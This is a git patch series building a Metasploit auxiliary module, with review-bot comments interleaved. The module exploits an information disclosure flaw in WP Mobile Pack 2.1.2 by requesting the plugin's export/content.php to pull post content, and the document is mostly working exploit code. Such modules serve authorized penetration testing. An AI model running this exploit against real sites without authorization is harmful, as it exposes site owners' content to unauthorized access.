From f4679f5341addf9c6a7ac6ea6cb7c01cc13fbc2d Mon Sep 17 00:00:00 2001
From: Roberto Soares
Date: Tue, 4 Aug 2015 02:21:26 -0300
Subject: [PATCH 1/5] Added WP Mobile Pack Info Disclosure Vuln - Functional Module.
---
 .../http/wp_mobile_pack_info_disclosure.rb | 79 +++++++++++++++++++
 1 file changed, 79 insertions(+)
 create mode 100644 modules/auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb
diff --git a/modules/auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb b/modules/auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb
new file mode 100644
index 0000000000..3ec9c4c703
--- /dev/null
+++ b/modules/auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb
@@ -0,0 +1,79 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+ include Msf::Auxiliary::Report
+ include Msf::HTTP::Wordpress
+ include Msf::Auxiliary::Scanner
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'WordPress Mobile Pack Information Disclosure Vulnerability',
+ 'Description' => %q{
+ This module exploits a information disclosure vulnerability in WordPress Plugin
+ "WP Mobile Pack" version 2.1.2, allowing to read files with privileges
+ informations.
+ },
+ 'References' =>
+ [
+ ['WPVDB', '8107']
+ ],
+ 'Author' =>
+ [
+ 'Nitin Venkatesh', # Vulnerability Discovery
+ 'Roberto Soares Espreto ' # Metasploit Module
+ ],
+ 'License' => MSF_LICENSE
+ ))
+
+ register_options(
+ [
+ OptString.new('POSTID', [true, 'Set the post identification to read', '1'])
+ ], self.class)
+ end
+
+ def check
+ check_plugin_version_from_readme('wordpress-mobile-pack', '2.1.3')
+ end
+
+ def run_host(ip)
+
+ postid = datastore['POSTID']
+
+ res = send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => normalize_uri(wordpress_url_plugins, 'wordpress-mobile-pack', 'export', 'content.php'),
+ 'vars_get' =>
+ {
+ 'content' => 'exportarticle',
+ 'callback' => 'exportarticle',
+ 'articleId' => "#{postid}"
+ }
+ )
+
+ if res && res.code == 200 && res.body.length > 0
+
+ vprint_status('Downloading information...')
+ vprint_line("\n#{res.body}\n")
+
+ fname = datastore['FILEPATH']
+
+ path = store_loot(
+ 'mobilepack.disclosure',
+ 'text/plain',
+ ip,
+ res.body,
+ fname
+ )
+
+ print_good("#{peer} - File saved in: #{path}")
+ else
+ print_error("#{peer} - Nothing was downloaded. You can try to verify the POSTID parameter.")
+ end
+ end
+end
From 19ceccd93a13bfd04910615d5eec6ebcff618be9 Mon Sep 17 00:00:00 2001
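Review bot: `check_plugin_version_from_readme('wordpress-mobile-pack', '2.1.3')` in `check` gives no hint why 2.1.3 is the comparison point when the description names 2.1.2 as the affected version; a why-comment such as `# 2.1.3 is presumably the first fixed release, 2.1.2 and earlier are affected -- confirm against the WPVDB entry` would make the version logic readable without opening the helper. In `run_host`, `'articleId' => "#{postid}"` interpolates a value that `datastore['POSTID']` already supplies as a string option, so `'articleId' => postid.to_s` states the intent without the interpolation. Both methods are complete within this new-file hunk.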
From: Roberto Soares
Date: Tue, 4 Aug 2015 03:13:11 -0300
Subject: [PATCH 2/5] Added JSON parse output.
---
 .../http/wp_mobile_pack_info_disclosure.rb | 32 +++++++++++--------
 1 file changed, 19 insertions(+), 13 deletions(-)
diff --git a/modules/auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb b/modules/auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb
index 3ec9c4c703..6e4630b574 100644
--- a/modules/auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb
+++ b/modules/auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb
@@ -45,30 +45,36 @@ class Metasploit3 < Msf::Auxiliary
 
 postid = datastore['POSTID']
 
- res = send_request_cgi(
- 'method' => 'GET',
- 'uri' => normalize_uri(wordpress_url_plugins, 'wordpress-mobile-pack', 'export', 'content.php'),
- 'vars_get' =>
- {
+ begin
+ res = send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => normalize_uri(wordpress_url_plugins, 'wordpress-mobile-pack', 'export', 'content.php'),
+ 'vars_get' => {
 'content' => 'exportarticle',
 'callback' => 'exportarticle',
 'articleId' => "#{postid}"
 }
- )
+ )
+ temp = JSON.parse(res.body.gsub(/exportarticle\(/, "").gsub(/\)/, ""))
+ rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, JSON::ParserError => e
+ print_error("#{peer} - The following Error was encountered: #{e.class}")
+ return
+ end
 
- if res && res.code == 200 && res.body.length > 0
+ if res &&
+ res.code == 200 &&
+ res.body.length > 0 &&
+ res.headers['Content-Type'].include?('application/json')
 
- vprint_status('Downloading information...')
- vprint_line("\n#{res.body}\n")
-
- fname = datastore['FILEPATH']
+ vprint_status('Enumerating information...')
+ res_clean = JSON.pretty_generate(temp)
+ vprint_good("Found:\n\n#{res_clean}\n")
 
 path = store_loot(
 'mobilepack.disclosure',
 'text/plain',
 ip,
- res.body,
- fname
+ res_clean
 )
 
 print_good("#{peer} - File saved in: #{path}")
From d9b6e9cc58286d52b077fb80a586cc2f8ae6b643 Mon Sep 17 00:00:00 2001
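Review bot: `temp = JSON.parse(res.body...)` dereferences `res` before the `if res && …` guard further down, so a nil return from `send_request_cgi` (no response) raises NoMethodError, which the rescue list (`::Rex::ConnectionRefused`, `::Rex::HostUnreachable`, `JSON::ParserError`) does not cover; guarding first, e.g. `temp = res && JSON.parse(...)`, lets the existing nil check below handle it. The `.gsub(/\)/, "")` strips every closing parenthesis from the body rather than only the JSONP wrapper, so any `)` inside the exported content is silently dropped from the stored loot; if the wrapper is exactly `exportarticle(…)`, `res.body.sub(/\Aexportarticle\(/, '').sub(/\)\s*\z/, '')` removes just the wrapper. `res.headers['Content-Type'].include?(...)` also raises when the header is absent; `res.headers['Content-Type'].to_s.include?('application/json')` is nil-safe, and the same condition is restated in the third patch's `@@ -63,10 +63,11 @@` hunk. run_host starts and ends outside this hunk.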
From: Roberto Soares
Date: Tue, 4 Aug 2015 03:44:25 -0300
Subject: [PATCH 3/5] Changed res condition and some words.
---
 .../scanner/http/wp_mobile_pack_info_disclosure.rb | 12 ++++++------
 1 file changed, 6 insertions(+), 6 deletions(-)
diff --git a/modules/auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb b/modules/auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb
index 6e4630b574..d9c69b9ca1 100644
--- a/modules/auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb
+++ b/modules/auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb
@@ -33,7 +33,7 @@ class Metasploit3 < Msf::Auxiliary
 
 register_options(
 [
- OptString.new('POSTID', [true, 'Set the post identification to read', '1'])
+ OptString.new('POSTID', [true, 'The post identification to read', '1'])
 ], self.class)
 end
 
@@ -63,10 +63,11 @@ class Metasploit3 < Msf::Auxiliary
 
 if res &&
 res.code == 200 &&
- res.body.length > 0 &&
- res.headers['Content-Type'].include?('application/json')
+ res.body.length > 29 &&
+ res.headers['Content-Type'].include?('application/json') &&
+ !res.body.include?('"error":')
 
- vprint_status('Enumerating information...')
+ vprint_status('Enumerating...')
 res_clean = JSON.pretty_generate(temp)
 vprint_good("Found:\n\n#{res_clean}\n")
 
@@ -76,10 +77,9 @@ class Metasploit3 < Msf::Auxiliary
 ip,
 res_clean
 )
-
 print_good("#{peer} - File saved in: #{path}")
 else
- print_error("#{peer} - Nothing was downloaded. You can try to verify the POSTID parameter.")
+ print_error("#{peer} - Nothing was downloaded. You can try checking the POSTID parameter.")
 end
 end
 end
From 7bb4f9479f5355b0f692e0d4d5d6f1d85d1187da Mon Sep 17 00:00:00 2001
From: Roberto Soares
Date: Tue, 4 Aug 2015 03:58:57 -0300
Subject: [PATCH 4/5] Added new reference and removed empty line.
---
 .../auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
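Review bot: `res.body.length > 29` in the `@@ -63,10 +63,11 @@` hunk is a bare magic number with nothing saying what 29 corresponds to; a comment such as `# 29 = length of <smallest valid payload> -- TODO confirm` (placeholder) or a named constant would make the threshold auditable. `!res.body.include?('"error":')` tests the raw JSONP text even though `temp` already holds the parsed JSON; if `temp` is a Hash, `!temp.key?('error')` is the precise check and cannot be tripped by the substring appearing inside exported article text. The other two hunks of this patch are wording changes only. The enclosing run_host starts outside the hunk.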
diff --git a/modules/auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb b/modules/auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb
index d9c69b9ca1..42b243f59a 100644
--- a/modules/auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb
+++ b/modules/auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb
@@ -21,7 +21,8 @@ class Metasploit3 < Msf::Auxiliary
 },
 'References' =>
 [
- ['WPVDB', '8107']
+ ['WPVDB', '8107'],
+ ['URL', 'https://packetstormsecurity.com/files/132750/']
 ],
 'Author' =>
 [
@@ -42,7 +43,6 @@ class Metasploit3 < Msf::Auxiliary
 end
 
 def run_host(ip)
-
 postid = datastore['POSTID']
 
 begin
From 9e7f6d65009e77a1ec5fd31614133896bd8886b3 Mon Sep 17 00:00:00 2001
From: wchen-r7
Date: Fri, 28 Aug 2015 13:42:37 -0500
Subject: [PATCH 5/5] Typos
---
 .../auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/modules/auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb b/modules/auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb
index 42b243f59a..ffa1494ac1 100644
--- a/modules/auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb
+++ b/modules/auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb
@@ -15,9 +15,9 @@ class Metasploit3 < Msf::Auxiliary
 super(update_info(info,
 'Name' => 'WordPress Mobile Pack Information Disclosure Vulnerability',
 'Description' => %q{
- This module exploits a information disclosure vulnerability in WordPress Plugin
+ This module exploits an information disclosure vulnerability in WordPress Plugin
 "WP Mobile Pack" version 2.1.2, allowing to read files with privileges
- informations.
+ information.
 },
 'References' =>
 [
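Review bot: The description in the `@@ -15,9 +15,9 @@` hunk still says the module reads "files" with "privileges information", but `run_host` requests `content.php` with `content=exportarticle` and `articleId=<POSTID>` and stores the returned JSON as loot, so the text does not match what the code does; wording along the lines of `allowing the content of a post to be exported by its id` (adjusted to what the referenced advisory states) would describe it. The two hunks of the fourth patch on this line are a reference addition and a blank-line removal and need nothing. The enclosing initialize starts and ends outside the hunk.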